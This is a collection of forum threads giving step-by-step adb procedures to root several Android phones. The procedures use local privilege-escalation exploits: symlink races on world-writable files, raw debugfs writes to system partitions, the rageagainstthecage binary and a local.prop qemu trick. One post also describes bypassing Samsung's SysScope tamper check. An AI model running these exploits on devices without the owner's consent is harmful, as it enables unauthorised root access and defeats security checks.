UPDATE: I created a tool based on this method. Head over to the new thread.
---
WARNING: This is WIP for now. Don't run it if you aren't comfortable with the possibility of having something go wrong and having to re-Odin back to stock or worse. I was already rooted and had Busybox installed, so even though I temp-unrooted first, I don't know for certain if this will work on a stock device. If anyone wants to flash back to pure stock and give it a shot, I'd appreciate it. If it works, I'll try and make it easier to use.
NOTE: This may give you the custom unlock screen! I'm not 100% certain it was this root method that did it, though, as I had installed BusyBox and frozen several system apps with TiBu before my most recent reboot. I need someone willing to test. I don't have time to backup, flash to stock, and retry at the moment.
Background: Since some people seem to have mysterious issues after flashing the root66 image, I've been looking at existing ICS root methods which don't require flashing ROMs to see if any work on the GSIII. I think I've found one.
This is an adaptation of miloj's root method for the Asus TF300T. All credit goes to him and anyone else he mentioned in his post.
Instructions:
Install the USB drivers if you don't have them already: Verizon_Wireless_I535_GSIII_Samsung_USB_Driver_v1_4_6_0.exe
Download the attached binary package and extract them somewhere
Set up adb and make sure you can see your phone
Run the following commands in a shell. Red is a prompt you will see on the screen, black is something you type, blue is a comment.
Code:
adb push debugfs /data/local/
adb push su /data/local/
adb shell
[COLOR="Red"]$[/COLOR] cd /data/local/
[COLOR="Red"]$[/COLOR] mv tmp tmp.bak
[COLOR="Red"]$[/COLOR] ln -s /dev/block/mmcblk0p14 tmp
[COLOR="Red"]$[/COLOR] exit
adb reboot
[COLOR="RoyalBlue"]... wait for phone to reboot ...[/COLOR]
adb shell
[COLOR="Red"]$[/COLOR] cd /data/local
[COLOR="Red"]$[/COLOR] toolbox chmod 755 /data/local/debugfs
[COLOR="Red"]$[/COLOR] /data/local/debugfs -w /data/local/tmp
[COLOR="Red"]debugfs:[/COLOR] cd xbin
[COLOR="Red"]debugfs:[/COLOR] rm su
[COLOR="Red"]debugfs:[/COLOR] write /data/local/su su
[COLOR="Red"]debugfs:[/COLOR] set_inode_field su mode 0106755
[COLOR="Red"]debugfs:[/COLOR] set_inode_field su uid 0
[COLOR="Red"]debugfs:[/COLOR] set_inode_field su gid 0
[COLOR="Red"]debugfs:[/COLOR] quit
[COLOR="Red"]$[/COLOR] rm /data/local/tmp
[COLOR="Red"]$[/COLOR] mv /data/local/tmp.bak /data/local/tmp
[COLOR="Red"]$[/COLOR] exit
adb reboot
[COLOR="RoyalBlue"]... wait for phone to reboot ...[/COLOR]
adb shell
[COLOR="Red"]$[/COLOR] /system/xbin/su
[COLOR="Red"]#[/COLOR] id
[COLOR="RoyalBlue"]You should see: id=0(root) gid=0(root) ....[/COLOR]
[COLOR="Red"]#[/COLOR] exit
[COLOR="Red"]$[/COLOR] rm /data/local/su
[COLOR="Red"]$[/COLOR] rm /data/local/debugfs
[COLOR="Red"]$[/COLOR] exit
This is using miloj's insecure su, so you should install the superuser app and immediately use its binary update feature to install a proper binary. Otherwise, you're just asking to get malware.
I very much like this root method. Would be interested to see if anyone else is able to get this successfully done on their stock devices.
Worst case, I'll be getting a replacement phone on Wednesday due to some minor screen issues, so I'll be forced to try it then.
Let US know if it works...I have slow connection that times out at 80% because of these huge Rom files
Sent from my SCH-I535 using xda app-developers app
Thanks for working on this Ninja, and thanks for sharing with us. :good:
Sounds like it will be the cleanest root method yet.
$ mv /data/local/tmp.back /data/local/tmp
should be
$mv /data/local/tmp.bak /data/local/tmp
---------- Post added at 05:46 PM ---------- Previous post was at 05:38 PM ----------
This is CONFIRMED working on my VIRGIN SGS3 I got today. had to fix the one typo above. No problems yet. just don't break things freezing too many apps. Somone script up a one click root. If you dont, I will tonight. (In about 3 or four hours or so.)
FlyingPoo said:
$ mv /data/local/tmp.back /data/local/tmp
should be
$mv /data/local/tmp.bak /data/local/tmp
Click to expand...
Click to collapse
The perils of copy/pasting half from the original post and half from my local shell.
FlyingPoo said:
This is CONFIRMED working on my VIRGIN SGS3 I got today. had to fix the one typo above. No problems yet. just don't break things freezing too many apps. Somone script up a one click root. If you dont, I will tonight. (In about 3 or four hours or so.)
Click to expand...
Click to collapse
I'm working on one now. It's about 2/3 done. I have to go run a couple errands before I can finish it, though.
alrighty, cool beans!
FlyingPoo, did you get the "custom unlock" boot screen after adding the su binary?
May have to try this one out! Thanks
Tool here: http://forum.xda-developers.com/showthread.php?t=1792342
Did not want to post in the tool thread to confuse people so maybe this can be used a basic research to make this method as seamless as possible? Let us know what you prefer Ninja.
Wanted to give some more details on the "custom unlock" boot screen. There was some new findings from Lee (aka ralekdev) who is working on unlocking the bootloader.
Ralekdev said:
In other news, I found what keeps resetting the 16 byte encrypted romtype in param.img. It's libcordon.so, which is from /system/app/SysScope.apk (it'll also be copied to /system/lib/libcordon.so). It's using quite a few checks to see if you've modified your system.
There's an adb scanner, checking to see if you've changed the ro.secure or ro.debuggable props.
The root process scanner checks running processes and returns true if any are found running as root that are not one of:
"debuggerd", "init", "installd", "servicemanager", "vold", "zygote", "netd", "ueventd", "dock_kbd_attach", "pppd", "pppd_runner", "mpdecision", "thermald", "hdmid", "sec_keyboard", "seccmmond", "mfsc", "mfdp"
There's also a partition check, kernel checker, su scanner, and a file scanning mechanism using data from a sqlite db
So to completely remove the Samsung custom screen on bootup and 5 second delay you'd need to disable the SysScope.apk, then encrypt and write the 16 bytes yourself using 0xFF000000 as the first int to mark yourself as official
Click to expand...
Click to collapse
If I understand correctly, there is a SysScope.apk that does various checks detailed in that post so I'm assuming if that apk is disabled on a "virgin" system after doing this process would ensure that the custom flag never gets touched. There is also mention of a system dynamic library that does some checks but not sure impact of disabling that as well, maybe makes more sense to see what would other process would be using it besides SysScope.apk.
Interesting stuff. Sounds like just freezing/removing them will still give custom unlock, but it might be possible to write replacements which don't actually do the checks.
Unfortunately, I won't have a huge amount of time to spend on research for the next two weeks, but I'll see what I can do, and see what the other devs have done with reversing SysScope and libcordon.
This root method reminds me of Motorola's infamous "zergRush" root exploit. A great way to root the device without even touching the ROM.
Noxious Ninja said:
Interesting stuff. Sounds like just freezing/removing them will still give custom unlock, but it might be possible to write replacements which don't actually do the checks.
Unfortunately, I won't have a huge amount of time to spend on research for the next two weeks, but I'll see what I can do, and see what the other devs have done with reversing SysScope and libcordon.
Click to expand...
Click to collapse
Sounds good.
I could be wrong but I'd imagine that since that by default the flag is not set so we should be good by just disabling them. I might just be the guinea pig and immediately rename SysScope and the libcordon after rooting to see if flag gets tripped.
Based on Lee's analysis what doesn't add up is why people who flash the full rooted "stock image" have not reported this flag being tripped yet...
lowg said:
Sounds good.
I could be wrong but I'd imagine that since that by default the flag is not set so we should be good by just disabling them. I might just be the guinea pig and immediately rename SysScope and the libcordon after rooting to see if flag gets tripped.
Based on Lee's analysis what doesn't add up is why people who flash the full rooted "stock image" have not reported this flag being tripped yet...
Click to expand...
Click to collapse
It might be that if you disable them while you don't have custom unlock, it works, but if you already have custom unlock you would have to reset it somehow.
If you decide to try it, see if you can still bring up the Settings ––> About device ––> Status menu to see Device status, or if that crashes.
Noxious Ninja said:
It might be that if you disable them while you don't have custom unlock, it works, but if you already have custom unlock you would have to reset it somehow.
If you decide to try it, see if you can still bring up the Settings ––> About device ––> Status menu to see Device status, or if that crashes.
Click to expand...
Click to collapse
Ok, after rooting, I immediately disabled only SysScope.apk by renaming it, installed Superuser from market and updated binary, rebooted no unlock screen. Settings -> About device -> Status works fine. Device status section shows "Scanning..." for about two minutes after rebooting then simply "Modified".
After this tried soft reboot, hard reboot numerous times and still no "custom unlock" boot screen.
lowg said:
FlyingPoo, did you get the "custom unlock" boot screen after adding the su binary?
Click to expand...
Click to collapse
hmm. actually i do. Altho my Device status says normal.
FlyingPoo said:
hmm. actually i do.
Click to expand...
Click to collapse
hmmm, maybe it does have something to do with that apk then. originally that's all I renamed but since then froze a lot of apps and still no unlock, only showing modified status
Sent from my SCH-I535
FlyingPoo can you post more about what you did after rooting?
Did you immediately installs the ChainsDD version of su (via the binary updater in the Superuser market app) or did you stick with the version of su that came with the script for a while?
Did you ever enter "Odin/Download" mode of your device?
Just trying to figure out how our devices could have a different status if we both started from "virgin" GS3s.. Don't want to assume it's just SysScope either since I never disabled the libcordon.so and maybe it's used in other places in the system...
Related
Make sure your battery has a decent amount of charge in it, you don't want to run out of juice in the middle of this.
You will need to have the android sdk installed, as you will need to use the adb tool.
Windows users will need to install HTC Sync in order to get the usb driver for the phone installed.
Part 1: In which we find that the Evo spreads easier than a Thai whore during tourist season
Code:
adb shell "rm /data/local/rights/mid.txt"
adb shell "ln -s /dev/mtd/mtd1 /data/local/rights/mid.txt"
adb reboot
Part 2: In which we find that engineers have no personality, but they make one hell of a bootloader
Put the files from Toast's Part 2, for nand unlock onto the sdcard (PC36IMG.zip, mtd-eng.img, recovery.img, flash_image)
then (after making sure the sdcard is remounted to the phone if you used disk mode to xfer the files):
Code:
adb shell "cat /sdcard/flash_image > /data/local/rights/flash_image"
adb shell "chmod 755 /data/local/rights/flash_image"
adb shell "/data/local/rights/flash_image misc /sdcard/mtd-eng.img"
adb reboot bootloader
When asked if you want to update, say yes. Relax for a while, the update takes some time.
When the phone eventually boots back up:
Part 3: In which I find the whore, and make her install a custom recovery
Code:
adb shell "cat /sdcard/flash_image > /data/flash_image"
adb shell "chmod 755 /data/flash_image"
adb shell "/data/flash_image recovery /sdcard/recovery.img"
After this you should be fully rooted with nand unlock.
I highly recommend going through Whitslack's Starting Over method to bring your software and radios up to date.
You're done.
Pity this only came to light a few days before people are going to be upgrading to a new OTA.
No, this will not work for anyone who updated to 2.2.
epic!!! 789
niice!
Nice Find!
At least now people can be rooted prior to the new OTA!
damn it!
___
Sweet! Wish I had that method starting out. Lol.
Sent from my PC36100 using XDA App
does this method really work??
BAttitude7689 said:
does this method really work??
Click to expand...
Click to collapse
Yes it does.
ok, so i have no idea how that works... care to go into it alittle bit more?
khshapiro said:
ok, so i have no idea how that works... care to go into it alittle bit more?
Click to expand...
Click to collapse
The init scripts chmod 777 mid.txt on boot (this means that anyone can do anything to the file basically). By removing the file and linking it to mtd1, the chmod now makes mtd1 accessible by everyone after a reboot, which means that you can go directly to toast's part2 which starts with flashing mtd-eng.img.
Incidentally it appears the droid eris guys have been using this flaw to their advantage for a while as well ;D.
So no, really? What is "root?"
You do fine work, sir
posting in a legendary thread
Couldn't you then just use wits "start over" method for part two to make the process even shorter?
netarchy said:
Part 1:
Code:
adb shell rm /data/local/rights/mid.txt
adb shell ln -s /dev/mtd/mtd1 /data/local/rights/mid.txt
adb reboot
Click to expand...
Click to collapse
What would be more interesting is for someone on the new OTA non-root to see if this exists in the Froyo release. I'll look around for a posting of the OTA update non-rooted and try it on my smashed phone. At least I won't care if that thing looses root.
Could we get a "The easiest 1.47.651.1 root method with nand unlock" for dummies? I have no clue what to do with this code.
You need to use an ADB shell for this using the Android SDK....
I tried to use the Evo-Recovery shell and received permission denied errors.
I am not a DEV by any means, and do not claim any credit for any of this. However, for people who need help, this may offer some assistance -- this is definitely the easiest root method out there.
1. Download and Install Android SDK - Learn Here
http://forum.xda-developers.com/showthread.php?t=694250
2. Open up a Command Prompt by holding windows button & pressing R or by pressing Run and typing CMD.
3. Navigate your way in DOS to the Android SDK folder, then to the Tools Folder
4. Then enter in the code in part 1. After each line press enter...the line will repeat below it.
5. Follow Toasts Part 2 -- Link: http://forum.xda-developers.com/showthread.php?t=701835 -- Video found here: http://www.youtube.com/watch?v=tUXTB0eydwE.
5A. Because you didn't do Toast's Part 1 of Root first (you used an exploit provided by the OP), you will NOT have a NAND Backup. Put the Custom ROM you want to load on your SD card, and after unlocking NAND protection and doing the wipes, load it from the custom recovery in lieu of restoring your NAND backup.
6. You're now rooted w/ NAND Unlocked!
7. I would then suggest going here, and running this so you have a fully rooted, stock ROM with all your radio/wimax up to date: http://forum.xda-developers.com/showthread.php?t=715915.
Anyone know if this method will work on an unrevoked3'd Evo? I am trying to acquire full root and I was going to use SimpleRoot today but if this will work...
Thank you for this! Question about number part 7. YOu suggest running the fully rooted stock 1.47.651.1 afterwards. Would it be a bad idea to Just run the fully rooted stock froyo 3.23.651.3 or even any other custom rom for that matter? i.e OMJ's EVO 2.2 Custom rom? Thanks
regulator207 said:
Couldn't you then just use wits "start over" method for part two to make the process even shorter?
Click to expand...
Click to collapse
No because you need the engineering hboot to flash it since it's not signed by HTC.
Should work on 1.32 or 1.47. Nice.
Someone should test if this still works in the new 2.2 update. Good chance it does.
damit!
justinisyoung said:
damn it!
___
Click to expand...
Click to collapse
Hey! That's what I was gonna say!
Disclaimer: This is not one-click. However, it IS relatively short and straightforward, and does not require you to downgrade.
Credits: The 743C exploit, and ChainsDD for Superuser.
You need:
Android SDK installed and working.
The zip attached to this post.
If you're still on Cupcake (Android 1.5) you'll need su and Superuser from http://bit.ly/su2361cd
So, let's get down to business.
Unzip the attached file into your /android-sdk/tools/ directory, it'll make your life (and ours) easier.
Open up your command line, change to the SDK tools directory, and enter these commands:
Code:
adb push rageagainstthecage-arm5.bin /data/local/tmp
adb shell chmod 755 /data/local/tmp/rageagainstthecage-arm5.bin
Now execute the exploit:
Code:
adb shell
/data/local/tmp/rageagainstthecage-arm5.bin
Wait for the exploit to finish.
Code:
exit
If it doesn't exit cleanly, chances are it worked, just close your terminal or command prompt and open a new one.
Test that it worked:
Code:
adb kill-server
adb start-server
adb shell
If you see a $, it DID NOT work, execute the exploit again. (Step 3)
If you see a #, it WORKED, continue:
Code:
mount -o remount,rw -t yaffs2 /dev/block/mtdblock3 /system
exit
adb push su /system/xbin
adb shell chmod 4755 /system/xbin/su
adb install Superuser.apk
You may need to ctrl-c once it says Success!
Next time you 'su' in adb shell, make sure to click Allow in Superuser!
You may instead install Superuser from the Market if you wish.
Clean up the exploit:
Code:
adb shell rm /data/local/tmp/rageagainstthecage-arm5.bin
If you ever do a "Factory Reset", Superuser will go away, but you DO NOT lose root. Just reinstall Superuser.
What next? The choice is yours! Remove stock apps, get some good 'ol WiFi tethering, or flash something different!
*NOTE*
The above steps DO NOT put a recovery on your phone, though it is VERY EASY.
Once you're rooted, install ROM Manager by Koushik Dutta from the Market. Open it up, click "Flash ClockworkMod Recovery".
Select your model (Hero CDMA), and hit Allow when the Superuser Prompt shows up.
*NOTE*
The above steps DO NOT install Busybox on your phone.
Simply install Busybox from Stephen (Stericson), available on the market.
Start the app and click Allow when prompted by Superuser.
How To Uninstall
Code:
adb shell
su
mount -o remount,rw -t yaffs2 /dev/block/mtdblock3 /system
rm /system/xbin/su
rm /etc/passwd
rm /etc/group
Uninstall Superuser.apk then reboot, and you're set!
tehdarkknight said:
Disclaimer: This is not one-click. However, it IS relatively short and straightforward.
Credits: The 743C exploit, and ChainsDD for Superuser.
You need:
Android SDK installed and working.
The zip attached to this post.
So, let's get down to business.
Unzip the attached file into your /android-sdk/tools/ directory, it'll make your life (and ours) easier.
Open up your command line, change to the SDK tools directory, and enter these commands:
Code:
adb push rageagainstthecage-arm5.bin /data/local/tmp
adb shell chmod 755 /data/local/tmp/rageagainstthecage-arm5.bin
Now execute the exploit:
Code:
adb shell
/data/local/tmp/rageagainstthecage-arm5.bin
Wait for the exploit to finish.
Code:
exit
If it doesn't exit cleanly, chances are it worked, just close your terminal or command prompt and open a new one.
Test that it worked:
Code:
adb kill-server
adb start-server
adb shell
If you see a $, it DID NOT work, execute the exploit again. (Step 3)
If you see a #, it WORKED, continue:
Code:
mount -o remount,rw -t yaffs2 /dev/block/mtdblock3 /system
exit
adb push su /system/xbin
adb shell chmod 4755 /system/xbin/su
adb install Superuser.apk
You may need to ctrl-c once it says Success!
Next time you 'su' in adb shell, make sure to click Allow in Superuser!
That's it!
I won't give directions on installing a recovery or flashing another rom, there are plenty of threads detailing how to do so.
Click to expand...
Click to collapse
Pretty straightforward. This will probably help a lot of newer hero owners, because amazingly, people are still buying them every day!
If I get a chance to test it out, I will.
Nice job. Should be stickied so people don't run around searching through all the old rooting threads which aren't as compatible with the newer RUU versions.
Worked nicely on a refurb Hero that Sprint sent due to the dust problem.
Thanks!
Works great for me
Why am I having trouble doing this? I was able to do it on one Hero though not after many retries, but not on another.
tehdarkknight said:
Disclaimer: This is not one-click. However, it IS relatively short and straightforward, and does not require you to downgrade.
Credits: The 743C exploit, and ChainsDD for Superuser.
Click to expand...
Click to collapse
Great! I can't live without WiFi tethering my iPad which is why I haven't done the 2.31.651.7 HTC OTA update at all.
So, I take it that this exploit will root the Official RUU_Hero_C_Sprint_2.31.651.7_signed_release.exe file then too? I ask because I really don't like to do 'update patches'. I prefer to flash and start fresh so I'm planning on flashing the RUU and then doing this root exploit. Yes, No???
DaWeav said:
Great! I can't live without WiFi tethering my iPad which is why I haven't done the 2.31.651.7 HTC OTA update at all.
So, I take it that this exploit will root the Official RUU_Hero_C_Sprint_2.31.651.7_signed_release.exe file then too? I ask because I really don't like to do 'update patches'. I prefer to flash and start fresh so I'm planning on flashing the RUU and then doing this root exploit. Yes, No???
Click to expand...
Click to collapse
I tested it with the very same RUU, it works.
tehdarkknight said:
I tested it with the very same RUU, it works.
Click to expand...
Click to collapse
SUPER!
Because when I saw this post, I tried to download the latest OTA patch, but my phone just responds 'Your phone is up to date. There are no updates available for your phone'. Strange, because I'm on 2.27.651.6 and the OTAcerts.ZIP is in tact.
Oh well, FEAR NOT, because after I get back from the store this morning, then get the TV tuned to the split screen with football on one and the baseball playoffs on the other, and get Leo Laporte's TechGuy radio show screaming...it'll be the perfect time to flash my phone to factory fresh.
Thanks.
Works perfectly on latest and "greatest" stock ROM... excellent
DaWeav said:
SUPER!
Because when I saw this post, I tried to download the latest OTA patch, but my phone just responds 'Your phone is up to date. There are no updates available for your phone'. Strange, because I'm on 2.27.651.6 and the OTAcerts.ZIP is in tact.
Click to expand...
Click to collapse
Same thing happened to me, that's why I tested this method with the RUU
What are the advantages to ruu'ing to. 7 and rooting again? I rooted my .5 hero and have had no problems....is there something significant that makes the extra work worth it?
Sent from my HERO200 using XDA App
tehdarkknight said:
Same thing happened to me, that's why I tested this method with the RUU
Click to expand...
Click to collapse
Well, I just did the RUU, then did this root, then loaded WiFi Tether, and I'm back in business with my iPad tethering.
Vandelay007 said:
What are the advantages to ruu'ing to. 7 and rooting again? I rooted my .5 hero and have had no problems....is there something significant that makes the extra work worth it?
Click to expand...
Click to collapse
One reason is that when I tried to download the latest OTA update today, I could not. And another reason is before I RUU'd, I had less than 50MB of available memory, but now I have 96MB available with all of my programs loaded again. So for me, it just seems more and more that Android (or HTC Sense) is like Windows boxes since it seems I have to reload the Android OS every now and then to clean things out.
Vandelay007 said:
What are the advantages to ruu'ing to. 7 and rooting again? I rooted my .5 hero and have had no problems....is there something significant that makes the extra work worth it?
Sent from my HERO200 using XDA App
Click to expand...
Click to collapse
Well, if you're using Sprint's official stock .5 rom, with no tweaks applied, you gain the advantage of having an up-to-date rom with the latest bugfixes from Sprint, plus I would say my root method is less invasive and more transparent than other root methods. My personal opinion is that it feels like a root method that can't be abused easily.
SuperOneClick
But I don't need storage space with firerats custom mtd partition....I have over 200mb free with over 50 apps and zero of them on m SD card
Sent from my HERO200 using XDA App
this isnt working.... I can't get passed step 3... my phones just restarts, and then i can't get any further than that.
devonkosa said:
this isnt working.... I can't get passed step 3... my phones just restarts, and then i can't get any further than that.
Click to expand...
Click to collapse
Give us some info. What's your ROM version?
aosp said:
SuperOneClick
Click to expand...
Click to collapse
Is SuperOneClick the same method of rooting?
chiill said:
Is SuperOneClick the same method of rooting?
Click to expand...
Click to collapse
Yes it is....
Ok guyz, I'm going to help yall out !!!!
Look at this and this works I just did it.... any questions pm me then I will post up on here....
http://forum.xda-developers.com/showthread.php?t=803682
This is for rooting your hero and other android devices, even at .7 on the Hero.... I just did this and I laughed at out quick and easy this was... Just make sure you are charge only, and you unzip the downloaded file,.. then open up the SuperOneClickv1.3-ShortFuse.zip on your computer somewhere and open up the SuperOneClick program, and bam you are done....
http://forum.xda-developers.com/atta...5&d=1286657043
Silly HTC. THIS EXPLOIT MAY NOT LAST FOREVER. ATT COULD KILL THIS. DO IT NOW.
Warning: If something goes wrong, whatever you do, do NOT install the update that this process finds. If you DO, you will be stuck on 2.20 with no chance for root (currently)
What you need:
HOX on ATT 1.85
su binary from http://dl.dropbox.com/u/don'tusemeimabadsubinary
EDIT: The su binary above has issues. Use this one instead: http://dl.dropbox.com/u/9060692/su
Make sure HTC sync is NOT RUNNING (down in system tray)
Make sure phone is set to "charge only" and usb debugging is enabled!
Put su in same directory as ADB. Get to adb command prompt and cd into that directory
NEW - pull sim card
NEW - do factory reset
NEW - when reset is complete, do not replace sim, do NOT connect to wifi. Go through setup, go to settings, enable USB debugging. When that's done:
adb shell rm /data/data/com.redbend.vdmc/lib/libvd*
adb reboot
After the device reboots:
adb shell ln -s /data/local.prop /data/data/com.redbend.vdmc/lib/libvdmscomo.so
(If you get file doesn't exist after the FIRST command don't worry - they may not be there)
Now, on the phone, go to settings and check for software update. It will tell you you need to connect to network. Now, replace the SIM OR connect to wifi. Have it check for software update again. When it's done, do NOT click "yes" or "ok" on the phone. Simply:
adb shell ls -l /data/local.prop
IF AND ONLY IF you get "file not exists" or anything like that then set your phone's date 2 days ahead and reboot the phone and start over. If you get file info, you're golden. Proceed....
adb shell "echo 'ro.kernel.qemu=1' > /data/local.prop"
Now it's time to reboot
adb reboot
After phones reboots
adb remount
adb push su /system/xbin/su
adb shell chown 0.0 /system/xbin/su
adb shell chmod 06755 /system/xbin/su
adb shell rm /data/local.prop
adb reboot
Congrats, you have root. Install supersu and busybox installer from the market (or Play store).
If you pledged a bounty in the bounty thread, note the instructions here:
Please pay bounty to make a wish foundation
http://www.wish.org/help/donate
Please choose the "Make a Wish Foundation of America" (don't select a chapter). You can use Paypal as well.
Special thanks to designgears as well for being my tester and also writing the one click. He has several hours of work in this project as well. Consider a donation to him, too - http://rootzwiki.com/store
ADDED: Please let me know if this works for you!
ADDED: If you already pushed the wrong binary it's easiest just to start over with the correct binary.
SWEEEEEEEEEEET!
You have just made a lot of people. SCC/FGFD
where do we get the su binary. I have a supersu zip to gain root after unlock
Great job guys!!!
Do terminal apps need root to run? Can I do this with terminal and avoid ADB?
I got "no updates found" and permission denied...
-rw------- system system 1196598 2012-05-25 12:36 local.prop
beaups you are the ****ing best!!!
AWESOME. Thank you so much!
Where do we get su binary?
I'm thinking maybe from a rooted phone? I have a rooted HTC Inspire.
shgadwa said:
AWESOME. Thank you so much!
Where do we get su binary?
I'm thinking maybe from a rooted phone? I have a rooted HTC Inspire.
Click to expand...
Click to collapse
I added the link to op
shgadwa said:
AWESOME. Thank you so much!
Where do we get su binary?
I'm thinking maybe from a rooted phone? I have a rooted HTC Inspire.
Click to expand...
Click to collapse
It's in the op
Sent from my HTC One X using Tapatalk 2
2nd line after adb shell i get no device found. USB debugging is enabled.
Very awesome. Hard work and dedication finally paid off. Thanks to who all that contributed to this.
Omg. Awesome. Who discovered this exploit?
My brother, give us your PayPal so we can donate. This is awesome.
Anyway to put the setting up of ADB in lamens terms for some of us that aren't familiar? I am ok with the commands, I just don't know how to get ADB to command prompt and where to place the files.
---------- Post added at 05:52 PM ---------- Previous post was at 05:52 PM ----------
gunnyman said:
Omg. Awesome. Who discovered this exploit?
Click to expand...
Click to collapse
beaups and dg
I updated to op to fix a wrong instruction.
when I put in the first line it says device not found. It's weird I can boot into boot into bootloader and everything but can't do that line
gunnyman said:
Omg. Awesome. Who discovered this exploit?
Click to expand...
Click to collapse
Once we get a few success stories I'll be claiming bounty (charity).
OMG GOOD JOB!!!! Im already rooted but im proud of you guys!!! GOOD JOB!! Hopefully Me and a Simonsimons will be releasing S=OFF SOON! fingers crossed
SkizzMcNizz said:
when I put in the first line it says device not found.
Click to expand...
Click to collapse
Try again, updated instructions.
Root for ZTE z990g aka ZTE Merit
by jcase - [email protected] - http://twitter.com/TeamAndIRC
June 16 2012 - Copyright 2012 CunningLogic
Do Not Distribute or republish without permission. (Sad that this is needed, but people/blogs like to profit off the work of others without credit)
Want to support my work? Donations are always appreciated, but never required:
Paypal: https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=LZ62YFU3XCEK8
Amazon Giftcards: [email protected]
Required files:
http://dl.dropbox.com/u/8699733/chainsdd-su.zip
Unzip chaindsdd-su.zip and then get a shell with adb
Code:
adb shell
Set up the dirs, so shell owns them prior to logging. If shell does not own them then we can not control them. If the logs dir already exists, you may have to do a factory reset to remove them. They should not exist unless someone attempted this previously.
Code:
mkdir /data/local/logs
mkdir /data/local/logs/kernel
Open emode's logset activity. First button should be for enabling log set, enable it. Do not exit the activity, but if you do just repeat the below command.
Code:
am start -a android.intent.action.MAIN -n com.zte.emode/.logset
Confirm the log_kernel.txt file exists, if it does not wait a minute and check again.
Code:
ls -l /data/local/logs/kernel/log_kernel.txt
If it exists, delete it and immediately symlink it to /data/local.prop, logset may recreate it, if it does delete and try symlinking again.
Code:
rm /data/local/logs/kernel/log_kernel.txt
ln -s /data/local.prop /data/local/logs/kernel/log_kernel.txt
Now we want to wait for /data/local.prop to be created, it may take a minute or two. Keep checking until it exists.
Code:
ls -l /data/local.prop
Now once /data/local.prop exists, go back to the logset activity and disable logset. If you don't disable it, it will slowly eat away at all the disk space, and possibly overwrite the local.prop before you get root. Now lets set qemu=1 then reboot.
Code:
echo 'ro.kernel.qemu=1' > /data/local.prop
exit
adb reboot
Once you have rebooted, remount, install su.
Code:
adb remount
adb push su /system/xbin/su
adb shell chown 0.0 /system/xbin/su
adb shell chmod 06755 /system/xbin/su
Clean up your mess!
Code:
adb shell rm /data/local.prop
adb shell rm -r /data/local/logs
Reboot, install the Superuser app from the market and enjoy
Code:
adb reboot
Might Not Work As Expected
I just tried this procedure from JCase at the RootzWiki dot com site with mixed results. The phone is a ZTE Merit Z990G from Straight Talk.
I went through all the steps and everything performed as expected. When I start start an app that requires superuser permissions, the app reports that the device has not been properly rooted. I have repeated the process as outlined four times, including downloading the SU file, and have the same results. Titanium Plus, Busy Box Pro and Root Check Basic report that the device is not rooted.
However, a couple of the Google apps - music, movies and reader seem to think the phone is rooted. Any ideas or suggestions will be very appreciated.
bitshifter52 said:
I just tried this procedure from JCase at the RootzWiki dot com site with mixed results. The phone is a ZTE Merit Z990G from Straight Talk.
I went through all the steps and everything performed as expected. When I start start an app that requires superuser permissions, the app reports that the device has not been properly rooted. I have repeated the process as outlined four times, including downloading the SU file, and have the same results. Titanium Plus, Busy Box Pro and Root Check Basic report that the device is not rooted.
However, a couple of the Google apps - music, movies and reader seem to think the phone is rooted. Any ideas or suggestions will be very appreciated.
Click to expand...
Click to collapse
Sounds like band permissions on su, try
adb shell ls -l /system/xbin/su
if the permissions come out as "-rwsr-sr-x" then you are rooted, try updating su with the suepruser app, or finding a different copy of su.
If the permissions are different or it says it doesnt exist, then you need to repeat the instructions as you missed one or two
jcase said:
Sounds like band permissions on su, try
adb shell ls -l /system/xbin/su
if the permissions come out as "-rwsr-sr-x" then you are rooted, try updating su with the suepruser app, or finding a different copy of su.
If the permissions are different or it says it doesnt exist, then you need to repeat the instructions as you missed one or two
Click to expand...
Click to collapse
Thank you for the fast response. Here are the permissions for the SU file and based on what you are saying they look good:
C:\SDK>adb shell ls -l /system/xbin/su
-rwsr-sr-x root root 22364 2012-06-17 12:47 su
I have located and downloaded a couple of "su" files from XDA and similar sites and the files are identical. I will continue searching for a different "su" file and see if that makes a difference.
---------- Post added at 06:15 PM ---------- Previous post was at 05:43 PM ----------
bitshifter52 said:
Thank you for the fast response. Here are the permissions for the SU file and based on what you are saying they look good:
C:\SDK>adb shell ls -l /system/xbin/su
-rwsr-sr-x root root 22364 2012-06-17 12:47 su
I have located and downloaded a couple of "su" files from XDA and similar sites and the files are identical. I will continue searching for a different "su" file and see if that makes a difference.
Click to expand...
Click to collapse
I looked around and did not find any "su" files that were different than what I downloaded according to the root process. Just for grins I copied the "su" file from my Noot Tablet which is rooted and tried that file. Sadly, it did not make a difference.
Please let me know if there is any other information I can provide or if you would like me to try something else.
What happens when you open the Superuser app (note this is not supersu) and go to settings/options and attempt to update su?
bitshifter52 said:
Thank you for the fast response. Here are the permissions for the SU file and based on what you are saying they look good:
C:\SDK>adb shell ls -l /system/xbin/su
-rwsr-sr-x root root 22364 2012-06-17 12:47 su
I have located and downloaded a couple of "su" files from XDA and similar sites and the files are identical. I will continue searching for a different "su" file and see if that makes a difference.
---------- Post added at 06:15 PM ---------- Previous post was at 05:43 PM ----------
I looked around and did not find any "su" files that were different than what I downloaded according to the root process. Just for grins I copied the "su" file from my Noot Tablet which is rooted and tried that file. Sadly, it did not make a difference.
Please let me know if there is any other information I can provide or if you would like me to try something else.
Click to expand...
Click to collapse
It Worked - But Don't Know Why...
jcase said:
What happens when you open the Superuser app (note this is not supersu) and go to settings/options and attempt to update su?
Click to expand...
Click to collapse
I re-installed Superuser and Superuser Elite and now the phone says it's rooted. I've been in IT for over 35 years and it makes me nervous when software "magically" fixes itself. But now that it's working I won't question it and proceed from here. I appreciate your help and your effort.
Cheers
bitshifter52 said:
I re-installed Superuser and Superuser Elite and now the phone says it's rooted. I've been in IT for over 35 years and it makes me nervous when software "magically" fixes itself. But now that it's working I won't question it and proceed from here. I appreciate your help and your effort.
Cheers
Click to expand...
Click to collapse
Generally you have to run superuser once to get it to work I've found, at least recent builds (or maybe its recent android builds)
Problem.
Hello, i have followed this entirely but at parts it says "Access denied" when im on certain parts when i tryed to check if the Kernel log was there it said "access denied" same with some folders.
root or no root
followed steps, ended up with this...
$ ls -l /system/xbin/su
ls -l /system/xbin/su
-rw-rw-rw- root root 22364 2012-07-15 09:25 su
the superuser app shows all blank under apps and logs, when i try to update it, it says "checking" for a few secs and then nothing... also wondering how to do a factory reset cuz if i didn't screw the phone up yet, i will thx in advance
Has you can see I'm new here. I'm old and retired I would love to root my ZTE Merit 2.3.5 but this is over my head.
